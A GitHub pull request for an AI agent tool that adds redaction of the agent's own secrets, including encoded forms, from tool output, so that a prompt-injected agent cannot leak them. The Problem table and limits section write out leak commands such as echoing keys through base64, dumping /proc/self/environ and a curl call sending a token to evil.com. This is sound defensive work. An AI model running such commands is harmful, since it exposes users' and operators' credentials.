Skip to content

fix(redact): close secret-leak gaps on the tool output surface#4

Merged
jkyberneees merged 1 commit into
mainfrom
fix/redact-known-value-leaks
Jun 3, 2026
Merged

fix(redact): close secret-leak gaps on the tool output surface#4
jkyberneees merged 1 commit into
mainfrom
fix/redact-known-value-leaks

Conversation

@jkyberneees
Copy link
Copy Markdown
Contributor

Problem

Tool output is redacted before it enters the transcript/session (internal/loop/loop.go:926), but the matcher is pattern-based — it only catches secrets whose format it recognises. That leaves real leak paths a prompt-injected agent can use:

Vector Example Before
Bare echo of a non-standard-format secret echo $TELEGRAM_BOT_TOKEN leaked (no name= context, shape unknown)
Encoded secret echo $API_KEY | base64 / xxd / rev leaked (value no longer matches any regex)
/proc environ dump cat /proc/self/environ partial

Scrubbing the process env is not an option — the agent needs its keys (above all the LLM API key) to function. So the fix belongs on the tool output surface.

Fix

A known-value redaction layer that complements the existing format patterns:

  • odek registers its own secrets at startup — resolved API key, Telegram bot token, and env vars with a secret-bearing name segment (config.LoadConfig; FD-supplied key in the subagent path).
  • Those exact values and their common encodings (base64 std/raw/url, hex, percent, reversed) are redacted wherever they appear, regardless of format — closing all three vectors for odek's own secrets.
  • Added a Telegram bot-token format pattern for tokens we don't hold.

Safety of the heuristic:

  • Env-name matching is on whole _/- segments, so GIT_AUTHOR_NAME (AUTHOR) / compass (PASS) are not treated as secrets.
  • Values under 8 chars are ignored (no over-redaction of ordinary text).
  • Matching is literal (strings.Replacer) — no regex metachar / ReDoS risk from arbitrary secret contents.

Honest limits (documented, not fixed here)

Redaction is a disclosure safety net, not an exfil guarantee. Arbitrary transformations (gzip, openssl enc, char-substitution) and side-channel exfiltration (curl -d "$TOKEN" evil.com, reverse shells, DNS tunnelling) never reach — or bypass — the tool surface, and stay the job of the network-egress controls (network_egress: prompt + non_interactive: deny + the egress denylist). See docs/REDACTION_HARDENING.md for the full threat model and the follow-up roadmap (streaming-boundary redaction, entropy heuristic for third-party secrets, redaction telemetry).

Tests

go test ./internal/redact/ — new coverage in known_value_test.go for each closed vector, env-scan selectivity, and the short-value guard. Touched packages (redact, config, loop, cmd/odek) all pass; go vet clean.

🤖 Generated with Claude Code

Tool output is redacted before it enters the transcript, but the
format-pattern matcher only catches secrets whose shape it recognises.
Three gaps let secrets through:

- a bare echo of a non-standard-format secret (e.g. a Telegram bot
  token, which has no name= context for the generic rule)
- a trivially encoded secret (echo $KEY | base64 / xxd / rev)
- a /proc/self/environ dump (NUL-delimited, no NAME= for the rule)

Add a known-value redaction layer: odek registers its own secrets (the
LLM API key, the Telegram bot token, sensitively-named env vars) at
startup and redacts those exact values plus their common encodings
(base64, hex, percent, reversed), regardless of format. This is the
reliable layer for odek's own secrets; the format patterns stay for
secrets we don't hold but recognise by shape. Also add a Telegram
bot-token pattern.

Env scanning matches whole _/- segments so GIT_AUTHOR_NAME and the like
are not mistaken for secrets; values under 8 chars are ignored to avoid
over-redaction. Matching is literal (strings.Replacer) — no ReDoS risk
from arbitrary secret contents.

The agent process keeps its keys (it needs them to talk to the model);
this only stops them leaking back out through tool output. Side-channel
exfiltration and arbitrary transformations remain the job of the
network-egress controls — documented in docs/REDACTION_HARDENING.md.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
@jkyberneees jkyberneees merged commit 681bcd9 into main Jun 3, 2026
6 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant